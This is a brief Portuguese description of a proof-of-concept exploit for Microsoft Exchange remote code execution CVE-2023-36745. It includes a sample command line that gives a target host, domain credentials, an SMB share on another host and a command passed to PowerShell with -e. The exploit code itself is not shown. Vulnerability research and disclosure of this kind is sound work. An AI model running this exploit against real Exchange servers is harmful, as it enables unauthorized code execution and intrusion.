
Exploit de prova de conceito para a vulnerabilidade RCE do Microsoft Exchange Server CVE-2023-36745, permitindo execução remota de código via injeção de comando PowerShell autenticada.
PoC de RCE do Microsoft Exchange Server CVE-2023-36745.
Exemplo:
python3 exp.py -H exchange.webdxg.com -u webdxg.com\dddai -p 4IDF7LAU -s \\192.168.237.131\Shares\ -c calc.exe
O comando será passado para powershell -e.